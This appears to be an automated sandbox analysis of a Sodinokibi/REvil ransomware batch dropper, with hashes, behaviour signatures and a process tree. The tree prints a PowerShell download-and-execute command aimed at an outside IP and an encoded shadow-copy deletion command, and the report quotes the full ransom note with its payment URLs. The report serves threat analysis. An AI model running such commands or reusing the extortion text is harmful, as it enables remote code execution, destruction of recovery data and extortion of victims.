Analysis

  • max time kernel
    140s
  • max time network
    35s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    21-05-2020 14:10

General

  • Target

    29ec9038cabce56dc3ae0d2ee20d9ed1.bat

  • Size

    218B

  • MD5

    b85f82f85e6208e52b6c015cd92e274d

  • SHA1

    367648ab3b293615c8b98a358c8b0cf5cf69950a

  • SHA256

    6d611f64b2ac03203102331de336feb8d67ea6e9f258e1b245614e239dd1df80

  • SHA512

    15ee6c6c54e1ccaaf594adc6cf271634684669c55dfe1a853429f374fe2eb53b92642c373a0836b3e55f98c2b7bc874b0ad5cf650a593811173ae7bd2a567e12

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/29ec9038cabce56dc3ae0d2ee20d9ed1

Extracted

Path

C:\i449h0d19-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension i449h0d19. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/B5220888DF7426CB 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/B5220888DF7426CB Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: y7eFoc0TvF8Fwl24+kFrBor7uT/v4eOPPgsdQXvnAV6D4axDoga41yka82DzqBfI aZ/VABqfiqDVC5dA9YM4P9eVjsqYQQzld8wXrUum6HH713D2I/X/eCAh80H+FIYz cEB0YzBgTFgoPHVcxea6Xif1wYCr2HmsYQTHO355IBCstwRsA8HoeD0PMN4PwJ2O QZxObuk6bEYylj+C2tGQdft6RJIai16TNR43kP069jLvWgqTiJAjqIdLlMb7/jQ4 SmO6+kNe9duZOCNW6O9Z7qWcfeaz/WQGkkHlCFWu3u0Vxf9p+OuFNYeanCYFvY9l al5V/5E3HQ7fen44iCaRKTs0UO8uEj3jr3Liy8TI+3ufNFsTV28NtpjMrhRWCP3T FS/CPrNtBQ6eSrDYnDQ6Pa/3DBGva4E1DE/Zrxh3lHlqfpUw9cqUMf5LBNRAonqd CHZhEw6QvOUXnEoqcPBDNxse41t1JgsXv2qJHDBiK0Dj/0aCyvlhwratQuY76VIe MkGiyp+ilyMi/grZTXreS016pW85t6N3q6Lk0UFyOXNERYWw87NNxs26STNQpcL9 ktY7rl+HYDBdzmfKhvwvmC/7pF8FfuUTSC3Mp7Xj2UxQx5WVd9q2/KwcmVmbGzna a8Z3EXWXuyaaSTV3qPujAfDNYgOyxXxS8mkdORY+KG4mB725GJJKj7YjfhZ6OBtr shjnrk8VDQVtx7bUf+8fBlT3QCEyKmvTiHV+9ZMjPioYH2DQPl20U4MZAwYVtl1U hXO/0E0I3SnjxXabapUS01O9Gb9y08n6H/evz5CQiYPL4iL3u2scH+TrNQf9anrp 3VrctW6RRoTDYXeCcISCv/Qbm3xwMbUpVBXfbXtT19hIY5zGyE4lzp9G9ZolN5Dy 21AGPT2VcqGoSL4ReGTMV7tJRyFSPgRKshroO5HB2hwQxLzYMEZf9dAcnQVIdm6s N6IQvz0ro0WtSpUfjaYQW77aIeTQPjhFPqzl6X6yCikPaNIGdiQrCf70dI+fQS+U FvtVF/dNxolZnmhcX7Ta2sKlbF3kzPm/oiDKHWLxkMNgcH4afIN4OT7/c/c/lKRx qsbjMuEim1YDqPLPEVXPylav6lh3XmgASlGhfCZDCvJIvI3pSjE07XSf7CvLfrn8 16PEJuV2PJ1tqCX6BRyYZ6MRGcK6UGHUj+4XteZ/Z+3D1TzgeMZwPeoCN2ilKevi suXAOHf07+aVWb2zh/+siUwE3OuitsPoS4UbbNEJ+J1zLmtev5FgEk7UZAhoXTTf vkfA84V1OF5WWnToihJ751wkum55eRevT6KH4qd9W3KQa7CmoDI= ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/B5220888DF7426CB

http://decryptor.cc/B5220888DF7426CB

Signatures

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs
  • Blacklisted process makes network request 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs
  • Drops file in Program Files directory 26 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 77 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Modifies service 2 TTPs 4 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\29ec9038cabce56dc3ae0d2ee20d9ed1.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1520
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/29ec9038cabce56dc3ae0d2ee20d9ed1');Invoke-PYPLANTTDQA;Start-Sleep -s 10000"
      2⤵
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of WriteProcessMemory
      • Blacklisted process makes network request
      • Sets desktop wallpaper using registry
      • Drops file in Program Files directory
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      PID:868
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        PID:1804
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Modifies service
    PID:464

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2f8f6cc7-ae83-4f79-b06e-2b9a49e06c5b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3f934678-4276-4d7d-9a2b-7ccacecf398b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_670419ca-9b90-4e9d-a6c5-f73b7563d382

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9065e065-05e7-4eaa-bb93-1db6da178e99

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a3b7b651-7089-41b5-9155-3fb877609508

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b7a807a3-f6b6-4397-972a-e9e81988f869

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms